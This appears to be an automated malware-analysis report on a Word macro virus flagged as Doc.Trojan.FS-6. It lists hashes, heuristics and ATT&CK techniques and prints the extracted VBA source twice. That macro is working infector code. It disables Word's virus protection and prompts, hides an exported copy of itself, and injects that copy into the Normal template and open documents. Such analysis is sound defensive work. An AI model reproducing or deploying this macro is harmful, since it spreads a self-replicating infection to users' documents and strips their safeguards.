Office (OLE) malware analysis — malicious · 1df654e93737a075

MALICIOUS

Office (OLE)

27.0 KB Created: 1999-08-05 06:12:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 422ac9a7c4dc96f4f191ac85d45edb5b SHA-1: 118d374a420c78bf182a15c871d6e28eb78ee2cf SHA-256: 1df654e93737a075c7ea15080d3b2c0b2915eb14aa02be34694266a337974af8

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1505.003 Server Software Component: Visual Basic for Applications

The sample is a Word document containing VBA macros. The macros attempt to infect the Normal template by exporting and then importing a component named 'Mscreate.dir'. This technique is commonly used by macro-based malware to establish persistence or spread to other documents. The ClamAV detection 'Doc.Trojan.FS-6' further supports the malicious nature of the file.

Heuristics 2

ClamAV: Doc.Trojan.FS-6 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.FS-6
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1029 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1029 bytes
SHA-256: `324293011284c356d2397c00e849052517c14f129f50617e9910b47dcaa2305e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Copyright (C) 1998 by FlyShadow ~^^~ - Quote Private Sub Document_Close() On Error Resume Next Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 WordBasic.DisableAutoMacros 0 Application.ScreenUpdating = 0 Application.EnableCancelKey = 0 ι = Application.StartupPath & "\Mscreate.dir" If GetAttr(ι) <> 34 Then SetAttr ι, 0: VBProject.VBComponents(1).Export ι: SetAttr ι, 34 With ActiveDocument.VBProject If .HelpContextID <> 1 Then _ .HelpContextID = 1: _ .VBComponents(1).CodeModule.AddFromFile ι: _ .VBComponents(1).CodeModule.DeleteLines 1, 4 End With With NormalTemplate.VBProject If .HelpContextID <> 1 Then _ .HelpContextID = 1: _ .VBComponents(1).CodeModule.AddFromFile ι: _ .VBComponents(1).CodeModule.DeleteLines 1, 4 End With End Sub

SHA-256: 324293011284c356d2397c00e849052517c14f129f50617e9910b47dcaa2305e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Quote
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
WordBasic.DisableAutoMacros 0
Application.ScreenUpdating = 0
Application.EnableCancelKey = 0
ι = Application.StartupPath & "\Mscreate.dir"
If GetAttr(ι) <> 34 Then SetAttr ι, 0: VBProject.VBComponents(1).Export ι: SetAttr ι, 34
With ActiveDocument.VBProject
If .HelpContextID <> 1 Then _
.HelpContextID = 1: _
.VBComponents(1).CodeModule.AddFromFile ι: _
.VBComponents(1).CodeModule.DeleteLines 1, 4
End With
With NormalTemplate.VBProject
If .HelpContextID <> 1 Then _
.HelpContextID = 1: _
.VBComponents(1).CodeModule.AddFromFile ι: _
.VBComponents(1).CodeModule.DeleteLines 1, 4
End With
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.